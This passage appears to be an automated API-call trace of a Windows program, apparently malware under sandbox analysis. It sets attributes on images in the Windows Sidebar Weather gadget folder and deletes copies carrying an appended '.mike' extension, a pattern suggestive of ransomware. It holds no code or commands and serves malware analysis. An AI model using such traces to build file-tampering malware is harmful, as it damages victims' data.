lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0106.020] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\btn_close_down_BIDI.png", dwFileAttributes=0x80) returned 0 [0106.021] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\btn_close_down_BIDI.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\btn_close_down_bidi.png.mike")) returned 1 [0106.022] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0106.027] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\btn_close_over.png", dwFileAttributes=0x80) returned 0 [0106.027] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\btn_close_over.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\btn_close_over.png.mike")) returned 1 [0106.029] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0106.033] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\btn_close_up.png", dwFileAttributes=0x80) returned 0 [0106.034] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\btn_close_up.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\btn_close_up.png.mike")) returned 1 [0106.035] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0106.039] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\btn_search_down.png", dwFileAttributes=0x80) returned 0 [0106.040] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\btn_search_down.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\btn_search_down.png.mike")) returned 1 [0106.042] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0106.046] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\btn_search_down_BIDI.png", dwFileAttributes=0x80) returned 0 [0106.047] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\btn_search_down_BIDI.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\btn_search_down_bidi.png.mike")) returned 1 [0106.048] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0106.053] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\btn_search_over.png", dwFileAttributes=0x80) returned 0 [0106.053] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\btn_search_over.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\btn_search_over.png.mike")) returned 1 [0106.055] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0106.059] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\btn_search_over_BIDI.png", dwFileAttributes=0x80) returned 0 [0106.060] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\btn_search_over_BIDI.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\btn_search_over_bidi.png.mike")) returned 1 [0106.061] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0106.065] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\btn_search_up.png", dwFileAttributes=0x80) returned 0 [0106.066] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\btn_search_up.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\btn_search_up.png.mike")) returned 1 [0106.068] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0106.072] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\btn_search_up_BIDI.png", dwFileAttributes=0x80) returned 0 [0106.072] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\btn_search_up_BIDI.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\btn_search_up_bidi.png.mike")) returned 1 [0106.074] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0106.078] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\divider-horizontal.png", dwFileAttributes=0x80) returned 0 [0106.078] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\divider-horizontal.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\divider-horizontal.png.mike")) returned 1 [0106.080] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0106.085] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\divider-vertical.png", dwFileAttributes=0x80) returned 0 [0106.085] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\divider-vertical.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\divider-vertical.png.mike")) returned 1 [0106.086] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0106.091] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked-loading.png", dwFileAttributes=0x80) returned 0 [0106.091] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked-loading.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\docked-loading.png.mike")) returned 1 [0106.093] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0106.098] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_cloudy.png", dwFileAttributes=0x80) returned 0 [0106.098] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_cloudy.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_cloudy.png.mike")) returned 1 [0106.100] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0106.104] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_few-showers.png", dwFileAttributes=0x80) returned 0 [0106.105] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_few-showers.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_few-showers.png.mike")) returned 1 [0106.107] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0106.111] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_foggy.png", dwFileAttributes=0x80) returned 0 [0106.112] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_foggy.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_foggy.png.mike")) returned 1 [0106.113] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0106.122] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_hail.png", dwFileAttributes=0x80) returned 0 [0106.122] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_hail.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_hail.png.mike")) returned 1 [0106.124] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0106.129] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-first-quarter.png", dwFileAttributes=0x80) returned 0 [0106.130] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-first-quarter.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_moon-first-quarter.png.mike")) returned 1 [0106.131] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0106.136] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-first-quarter_partly-cloudy.png", dwFileAttributes=0x80) returned 0 [0106.136] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-first-quarter_partly-cloudy.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_moon-first-quarter_partly-cloudy.png.mike")) returned 1 [0106.138] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0106.143] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-full.png", dwFileAttributes=0x80) returned 0 [0106.143] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-full.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_moon-full.png.mike")) returned 1 [0106.145] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0106.149] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-full_partly-cloudy.png", dwFileAttributes=0x80) returned 0 [0106.150] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-full_partly-cloudy.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_moon-full_partly-cloudy.png.mike")) returned 1 [0106.152] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0106.156] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-last-quarter.png", dwFileAttributes=0x80) returned 0 [0106.157] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-last-quarter.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_moon-last-quarter.png.mike")) returned 1 [0106.160] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0106.165] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-last-quarter_partly-cloudy.png", dwFileAttributes=0x80) returned 0 [0106.165] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-last-quarter_partly-cloudy.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_moon-last-quarter_partly-cloudy.png.mike")) returned 1 [0106.167] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0106.172] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-new.png", dwFileAttributes=0x80) returned 0 [0106.173] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-new.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_moon-new.png.mike")) returned 1 [0106.174] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0106.193] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-new_partly-cloudy.png", dwFileAttributes=0x80) returned 0 [0106.194] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-new_partly-cloudy.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_moon-new_partly-cloudy.png.mike")) returned 1 [0106.196] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0106.201] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-waning-crescent.png", dwFileAttributes=0x80) returned 0 [0106.201] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-waning-crescent.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_moon-waning-crescent.png.mike")) returned 1 [0106.203] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0106.208] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-waning-crescent_partly-cloudy.png", dwFileAttributes=0x80) returned 0 [0106.208] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-waning-crescent_partly-cloudy.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_moon-waning-crescent_partly-cloudy.png.mike")) returned 1 [0106.210] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0106.215] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-waning-gibbous.png", dwFileAttributes=0x80) returned 0 [0106.215] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-waning-gibbous.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_moon-waning-gibbous.png.mike")) returned 1 [0106.217] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0106.222] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-waning-gibbous_partly-cloudy.png", dwFileAttributes=0x80) returned 0 [0106.222] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-waning-gibbous_partly-cloudy.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_moon-waning-gibbous_partly-cloudy.png.mike")) returned 1 [0106.224] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0106.229] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-waxing-crescent.png", dwFileAttributes=0x80) returned 0 [0106.229] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-waxing-crescent.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_moon-waxing-crescent.png.mike")) returned 1 [0106.231] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0106.235] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-waxing-crescent_partly-cloudy.png", dwFileAttributes=0x80) returned 0 [0106.236] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-waxing-crescent_partly-cloudy.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_moon-waxing-crescent_partly-cloudy.png.mike")) returned 1 [0106.238] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0106.243] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-waxing-gibbous.png", dwFileAttributes=0x80) returned 0 [0106.243] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-waxing-gibbous.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_moon-waxing-gibbous.png.mike")) returned 1 [0106.245] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0106.250] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-waxing-gibbous_partly-cloudy.png", dwFileAttributes=0x80) returned 0 [0106.250] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-waxing-gibbous_partly-cloudy.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_moon-waxing-gibbous_partly-cloudy.png.mike")) returned 1 [0106.252] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0106.258] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_rainy.png", dwFileAttributes=0x80) returned 0 [0106.258] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_rainy.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_rainy.png.mike")) returned 1 [0106.259] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0106.265] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_snow.png", dwFileAttributes=0x80) returned 0 [0106.265] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_snow.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_snow.png.mike")) returned 1 [0106.268] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0106.274] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_thunderstorm.png", dwFileAttributes=0x80) returned 0 [0106.275] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_thunderstorm.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_thunderstorm.png.mike")) returned 1 [0106.277] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0106.284] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_windy.png", dwFileAttributes=0x80) returned 0 [0106.284] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_windy.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_windy.png.mike")) returned 1 [0106.286] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, 